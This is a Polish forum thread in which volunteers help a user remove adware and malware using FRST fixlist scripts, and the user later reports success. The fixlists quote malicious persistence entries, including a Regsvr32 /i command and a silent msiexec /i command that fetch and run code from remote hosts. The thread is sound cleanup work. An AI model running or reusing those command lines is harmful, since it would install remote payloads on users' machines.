Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Pomoc odnośnie wydajności komputera.

Grzesiek2op 20 Kwi 2017 00:15 549 8
  • #1 20 Kwi 2017 00:15
    Grzesiek2op
    Poziom 3  

    Witam,
    Problem zaczął się ok tydzień temu.
    Kilka razy na dzieńśrednio co 3 godz. wyskakuja mi powiedomienia od avast związane z problemami z wydajnością komputera.
    Nie da się tego usunąć dostępnymi programami, nic rzaden z nich nie wykrywa.
    Obiekt:http//point.lotusiloveyou.com?/data=zDlkPGN8... - komuniakt z avasta.

    Proszę o pomoc w rozwiązaniu tego problemu.

    0 8
  • #2 20 Kwi 2017 02:19
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    Task: {1317401B-9EE0-46F9-8CC9-EE63E2AF3A6B} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA
    Task: {16BCDFFD-870A-4494-BF0C-42836AEC9977} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    Task: {2746C296-7BB0-4CFB-9BE1-69765644C59E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA
    Task: {365027BD-D033-4F23-ADC4-ECB822AB95A7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {4D38D235-591F-4266-B56D-01EFD5C288AE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {5DB514AD-88E7-4B58-BA50-C85A0E2370FD} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {61580D41-F34B-433F-BB2D-3FEA91074D53} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA
    Task: {7E044A0B-38F0-412F-89E9-CFDCEF069E19} - System32\Tasks\{1945CCA9-BAD2-45B6-BD61-0BEA74C56948} => pcalua.exe -a C:\Users\Grzegorz\Downloads\anki-2.0.33.exe -d C:\Users\Grzegorz\Downloads
    Task: {83A4AB8B-D528-4512-B9BA-7B2298BC4750} - \WPD\SqmUpload_S-1-5-21-3360595278-2965849811-1094420720-1001 -> Brak pliku <==== UWAGA
    Task: {95292858-55D8-4DD0-B953-AA48EF16923E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA
    Task: {9B09C5DF-C605-4E8F-9B72-24066DD417DF} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA
    Task: {AA1BB18E-1C53-4874-8A10-937D8B27EAAA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA
    Task: {CDB8D566-2C59-4FB0-99B9-57A0879728D6} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA
    Task: {D499D497-8F76-42A9-B21E-38E6F71D7FD9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA
    Task: {DE416C10-9620-40DB-9173-091E28511FAE} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {E221EDCF-64E7-49B1-9486-2431A89869C9} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8NTHcrAFcMTItMDReMTFyG3wdwXNxnjRgnAh4nAwdwXNxnjRg scrobj.dll
    Shortcut: C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)
    Hosts:
    HKU\S-1-5-21-3360595278-2965849811-1094420720-1001\...\MountPoints2: {1dfd1d63-d529-11e6-82a2-1cb72c0dbbc3} - "F:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-3360595278-2965849811-1094420720-1001\...\MountPoints2: {1dfd1d94-d529-11e6-82a2-1cb72c0dbbc3} - "F:\HiSuiteDownLoader.exe"
    IFEO\taskmgr.exe: [Debugger]
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
    S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [82072 2015-09-23] (McAfee, Inc.)
    R1 MPCKpt; C:\WINDOWS\System32\DRIVERS\MPCKpt.sys [60136 2016-01-27] (DotC United Inc) <==== UWAGA
    2017-04-18 21:57 - 2016-06-08 21:28 - 00000000 ____D C:\AdwCleaner
    2017-03-21 09:35 - 2015-03-28 03:40 - 00000000 ____D C:\ProgramData\McAfee
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze obok FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #4 20 Kwi 2017 10:39
    Kolobos
    Spec od komputerów

    @krzychupar jak zwykle pominal wiekszosc infekcji...

    @Grzesiek2op wykonaj jeszcze taki Fixlist.txt:
    CloseProcesses:
    () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    HKU\S-1-5-21-3360595278-2965849811-1094420720-1001\...\Run: [BingSvc] => C:\Users\Grzegorz\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
    HKU\S-1-5-21-3360595278-2965849811-1094420720-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGN...crAFcMTItMDReMTFyG3wdwXNxnjRgnAh4nAwdwXNxnjRg /q
    HKU\S-1-5-21-3360595278-2965849811-1094420720-1001\...\MountPoints2: {1dfd1d63-d529-11e6-82a2-1cb72c0dbbc3} - "F:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-3360595278-2965849811-1094420720-1001\...\MountPoints2: {1dfd1d94-d529-11e6-82a2-1cb72c0dbbc3} - "F:\HiSuiteDownLoader.exe"
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    FF Extension: (Browser-Security) - C:\Users\Grzegorz\AppData\Roaming\Mozilla\Firefox\Profiles\5ffptk4m.Domyślny użytkownik\Extensions\firefox@browser-security.de.xpi [2017-03-08]
    FF Extension: (SimilarWeb) - C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\5ffptk4m.Domyślny użytkownik\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-19] [Brak podpisu cyfrowego]
    FF Extension: (HSearch) - C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\5ffptk4m.Domyślny użytkownik\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-19] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\5ffptk4m.Domyślny użytkownik\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-19] [Brak podpisu cyfrowego]
    FF Extension: (Browser-Security) - C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\5ffptk4m.Domyślny użytkownik\Extensions\firefox@browser-security.de.xpi [2017-03-08]
    FF SearchPlugin: C:\Users\Grzegorz\AppData\Roaming\Firefox\Firefox\Profiles\5ffptk4m.Domyślny użytkownik\searchplugins\startsearch.xml [2017-04-19]
    S2 3DM; C:\Users\Grzegorz\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] () [Brak podpisu cyfrowego]
    R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-19] ()
    R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Brak podpisu cyfrowego]
    2017-04-20 00:08 - 2017-04-20 00:08 - 00000000 ____D C:\ProgramData\SWCUTemp
    2017-04-19 13:22 - 2017-04-19 13:22 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-19 13:06 - 2017-04-19 13:06 - 00000000 ____D C:\Users\Grzegorz\AppData\Local\Dohat
    2017-04-19 13:06 - 2017-04-19 13:06 - 00000000 ____D C:\Program Files (x86)\Dohat
    2017-04-19 12:32 - 2017-04-19 23:59 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-19 12:32 - 2017-04-19 22:49 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-19 12:32 - 2017-04-19 12:32 - 00000000 ____D C:\Users\Grzegorz\AppData\Local\3DM
    2017-04-19 12:28 - 2017-04-19 12:32 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-18 23:47 - 2017-04-18 23:49 - 01268552 _____ ( ) C:\Users\Grzegorz\Downloads\Wise Care 365 Free 4.61.439.exe
    2017-04-11 17:38 - 2017-04-11 17:38 - 00000000 ____D C:\Users\Grzegorz\AppData\Roaming\SSMgre
    2017-04-10 13:00 - 2017-04-10 13:00 - 00003670 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-07 10:36 - 2017-04-07 10:36 - 01255768 _____ ( ) C:\Users\Grzegorz\Downloads\Diagram-Designer-12518-AsystentPobierania.exe
    2017-04-05 19:16 - 2017-04-05 19:45 - 09275712 _____ (Piriform Ltd) C:\Users\Grzegorz\Downloads\ccsetup528pro(1).exe
    2017-04-18 21:57 - 2016-06-08 21:28 - 00000000 ____D C:\AdwCleaner

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    > R1 MPCKpt; C:\WINDOWS\System32\DRIVERS\MPCKpt.sys [60136 2016-01-27] (DotC United Inc) <==== UWAGA
    To zapewne bedzie trzeba usunac z poziomu WinRe, ale to pozniej.

    0
  • Pomocny post
    #8 20 Kwi 2017 21:46
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0
  • #9 20 Kwi 2017 22:13
    Grzesiek2op
    Poziom 3  

    Dzięki za pomoc, komunikat już nie wyświetla się, wydaje się że jest wszystko ok.

    0